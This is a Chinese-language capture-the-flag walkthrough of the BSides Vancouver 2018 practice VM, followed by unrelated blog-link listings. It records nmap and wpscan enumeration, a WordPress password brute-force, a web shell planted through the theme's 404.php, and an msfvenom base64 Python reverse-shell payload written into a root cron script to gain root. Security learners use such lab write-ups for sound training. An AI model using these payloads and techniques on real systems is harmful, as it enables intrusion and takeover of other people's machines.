关于

  1. 下载链接
  2. 目标:拿到root用户目录下的flag.txt
  3. 全程无图!

信息收集

  1. 因为虚拟机网络是设置Host-only,所以是vmnet1这张网卡,IP段为192.168.7.1/24
  2. nmap -T4 192.168.7.1/24 -A

Nmap scan report for 192.168.7.128

Host is up (0.00040s latency).

Not shown: 997 closed ports

PORT   STATE SERVICE VERSION

21/tcp open  ftp     vsftpd 2.3.5

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

|_drwxr-xr-x    2 65534    65534        4096 Mar 03 17:52 public

22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

|   1024 85:9f:8b:58:44:97:33:98:ee:98:b0:c1:85:60:3c:41 (DSA)

|   2048 cf:1a:04:e1:7b:a3:cd:2b:d1:af:7d:b3:30:e0:a0:9d (RSA)

|_  256 97:e5:28:7a:31:4d:0a:89:b2:b0:25:81:d5:36:63:4c (ECDSA)

80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))

| http-robots.txt: 1 disallowed entry

|_/backup_wordpress

|_http-server-header: Apache/2.2.22 (Ubuntu)

|_http-title: Site doesn't have a title (text/html).

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 256 IP addresses (2 hosts up) scanned in 16.54 seconds

  1. 从上面可以看到服务器开放了21端口,对应的是FTP服务,还是可以匿名访问的。

    浏览器服务:ftp://192.168.7.128/public/users.txt.bk

  2. 还开放了80端口,robots.txt里有一个/backup_wordpress目录

    很明显式一个WordPress,直接上wpscan扫一下

  3. wpscan --url http://192.168.7.128/backup_wordpress/ --enumerate

[+] WordPress theme in use: twentysixteen - v1.2

[+] Name: twentysixteen - v1.2

 |  Last updated: 2018-05-17T00:00:00.000Z

 |  Location: http://192.168.7.128/backup_wordpress/wp-content/themes/twentysixteen/

 |  Readme: http://192.168.7.128/backup_wordpress/wp-content/themes/twentysixteen/readme.txt

[!] The version is out of date, the latest version is 1.5

 |  Style URL: http://192.168.7.128/backup_wordpress/wp-content/themes/twentysixteen/style.css

 |  Referenced style.css: wp-content/themes/twentysixteen/style.css

 |  Theme Name: Twenty Sixteen

 |  Theme URI: https://wordpress.org/themes/twentysixteen/

 |  Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthe...

 |  Author: the WordPress team

 |  Author URI: https://wordpress.org/

[+] Enumerating usernames ...

[+] We identified the following 2 users:

    +----+-------+------+

    | ID | Login | Name |

    +----+-------+------+

    | 1  | admin | admi |

    | 2  | john  | joh  |

    +----+-------+------+

[!] Default first WordPress username 'admin' is still used

其实很多漏洞都是XSS或其他需要管理员交互的漏洞,所以很难利用。这里收集到的有博客用的主题,管理员的用户名为john,在博客写的也可以看出来。

爆破

  1. wpscan --url http://192.168.7.128/backup_wordpress/ --username john --wordlist dic.txt

  2. 得到密码是enigma

  3. 登录改主题的404.php,getshell后发现没有root权限。

  4. 获取任务定时计划cat /etc/crontab

    # /etc/crontab: system-wide crontab
    
# Unlike any other crontab you don't have to run the `crontab'
    
# command to install the new version when you edit this file
    
# and files in /etc/cron.d. These files also have username fields,
    
# that none of the other crontabs do.

SHELL=/bin/sh
    
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user    command
    
17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
    
25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    
47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    
52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    
*  *    * * *   root    /usr/local/bin/cleanup

  5. 在这可以看到有一个用root权限运行的cleanup的脚本。

  6. 先生成反弹shell的payload

kali-team@LTS:~$ sudo msfvenom -p cmd/unix/reverse_python lhost=192.168.7.1 lport=4444 R

[sudo] kali-team 的密码: 

[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload

[-] No arch selected, selecting arch: cmd from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 601 bytes

python -c "exec('aW1wb3J0IHNvY2tldCAgICAgLCAgICAgICAgIHN1YnByb2Nlc3MgICAgICwgICAgICAgICBvcyAgICAgOyAgICAgICBob3N0PSIxOTIuMTY4LjcuMSIgICAgIDsgICAgICAgcG9ydD00NDQ0ICAgICA7ICAgICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICAgLCAgICAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgIDsgICAgICAgcy5jb25uZWN0KChob3N0ICAgICAsICAgICAgICAgcG9ydCkpICAgICA7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAgICAgIDApICAgICA7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAgICAgIDEpICAgICA7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAgICAgIDIpICAgICA7ICAgICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"
  1. 用nc监听本地的4444端口nc -lvp 4444
  2. 把payload复制到cleanup脚本里保存,坐等shell反弹回来
  3. 获取flag
kali-team@LTS:~$ nc -lvp 4444

Listening on [0.0.0.0] (family 0, port 4444)

Connection from [192.168.7.128] port 4444 [tcp/*] accepted (family 2, sport 51156)

ls

flag.txt

id

uid=0(root) gid=0(root) groups=0(root)

cat flag.txt

Congratulations!

If you can read this, that means you were able to obtain root permissions on this VM.

You should be proud!

There are multiple ways to gain access remotely, as well as for privilege escalation.

Did you find them all?

@abatchy17

write-up录像

CTF-BSides Vancouver: 2018 (Workshop)

[Write-up]BSides-Vancouver的更多相关文章

  1. Hacking Bsides Vancouver 2018 walkthrough

    概述: Name: BSides Vancouver: 2018 (Workshop) Date release: 21 Mar 2018 Author: abatchy Series: BSides ...

  2. ROSCon 2017通知 Announcing ROSCon 2017: September 21st and 22nd in Vancouver

    ROSCon 2017通知:9月21日和22日在温哥华 我们很高兴地宣布,2017年ROSCon将在举行9月21-22日,2017年温哥华会议中心在加拿大温哥华.2017年IROS将在同一地点9月24 ...

  3. 深入理解 Java G1 垃圾收集器--转

    原文地址:http://blog.jobbole.com/109170/?utm_source=hao.jobbole.com&utm_medium=relatedArticle 本文首先简单 ...

  4. LINQ to SQL语句(7)之Exists/In/Any/All/Contains

    适用场景:用于判断集合中元素,进一步缩小范围. Any 说明:用于判断集合中是否有元素满足某一条件:不延迟.(若条件为空,则集合只要不为空就返回True,否则为False).有2种形式,分别为简单形式 ...

  5. 年终巨献 史上最全 ——LINQ to SQL语句

    LINQ to SQL语句(1)之Where 适用场景:实现过滤,查询等功能. 说明:与SQL命令中的Where作用相似,都是起到范围限定也就是过滤作用的,而判断条件就是它后面所接的子句.Where操 ...

  6. Linq to SQL 语法查询(链接查询,子查询 & in操作 & join,分组统计等)

    Linq to SQL 语法查询(链接查询,子查询 & in操作 & join,分组统计等) 子查询 描述:查询订单数超过5的顾客信息 查询句法: var 子查询 = from c i ...

  7. JS组件系列——Bootstrap组件福利篇:几款好用的组件推荐(二)

    前言:上篇 JS组件系列——Bootstrap组件福利篇:几款好用的组件推荐 分享了几个项目中比较常用的组件,引起了许多园友的关注.这篇还是继续,因为博主觉得还有几个非常简单.实用的组件,实在不愿自己 ...

  8. 【转载】关于treeview的多层显示的科学用法!

    http://blogs.msdn.com/b/mikehillberg/archive/2009/10/30/treeview-and-hierarchicaldatatemplate-step-b ...

  9. MapReduce的核心资料索引 [转]

    转自http://prinx.blog.163.com/blog/static/190115275201211128513868/和http://www.cnblogs.com/jie46583173 ...

  10. Java Programming Language Enhancements

    引用:Java Programming Language Enhancements Java Programming Language Enhancements Enhancements in Jav ...

随机推荐

  1. 【PAT甲级】1098 Insertion or Heap Sort (25 分)

    题意: 输入一个正整数N(<=100),接着输入两行N个数,表示原数组和经过一定次数排序后的数组.判断是经过插入排序还是堆排序并输出再次经过该排序后的数组(数据保证答案唯一). AAAAAcce ...

  2. 【译】高级T-SQL进阶系列 (七)【上篇】:使用排序函数对数据进行排序

    [译注:此文为翻译,由于本人水平所限,疏漏在所难免,欢迎探讨指正] 原文链接:传送门. 什么是排序函数(Ranking Functions)? 排序函数基于一组记录的集合返回一个排序值.一个排序值其实 ...

  3. layui 延时加载

    //延时关闭当前页面,并刷新父页面layer.msg('提交成功',{time: 1800},function () { parent.layer.close(index); window.paren ...

  4. Oracle_11g_x64的安装与完全卸载

    安装: https://jingyan.baidu.com/article/363872eccfb9266e4aa16f5d.html 完全卸载: https://blog.csdn.net/m0_3 ...

  5. 【笔记7-部署发布】从0开始 独立完成企业级Java电商网站开发(服务端)

    阿里云服务 购买 连接 购买域名 域名备案 域名解析 源配置步骤 资源地址 http://learning.happymmall.com/ 配置阿里云的yum源 1.备份 mv /etc/yum.re ...

  6. MS17_010漏洞攻击Windows7

    攻击主机系统:Kali Linux 2018 目标主机系统:Windows7 x64 1.攻击主机启动Metasploit: msfconsole 2.查找MS17_010漏洞相关的信息: searc ...

  7. lena全身像

    数字图像处理中,Lena(Lenna)是一张被广泛使用的标准图片,特别在图像压缩的算法研究中 (为什么用这幅图,是因为这图的各个频段的能量都很丰富:即有低频(光滑的皮肤),也有高频(帽子上的羽毛),很 ...

  8. Python中注释与声明

    Python中注释的写法 #:使用井号进行单行注释 Python中貌似没有提供多行注释,不过我们可以利用三引号的多行字符串来进行多行注释 """ 多行注释内容 多行注释内 ...

  9. 用for循环写这段代码

    之前用while循环写了一段代码,现在改为用for循环来写,代码如下: hongtao_age = 38 for i in range(5): guess_age = int(input(" ...

  10. 【代码审计】PHPCMS2008任意代码执行漏洞

    很老的漏洞了,但很经典~ 在 phpcms2008/include/global.func.php eval  可以执行命令 在这里我们看一下是谁调用 跟进string2array函数 yp/web/ ...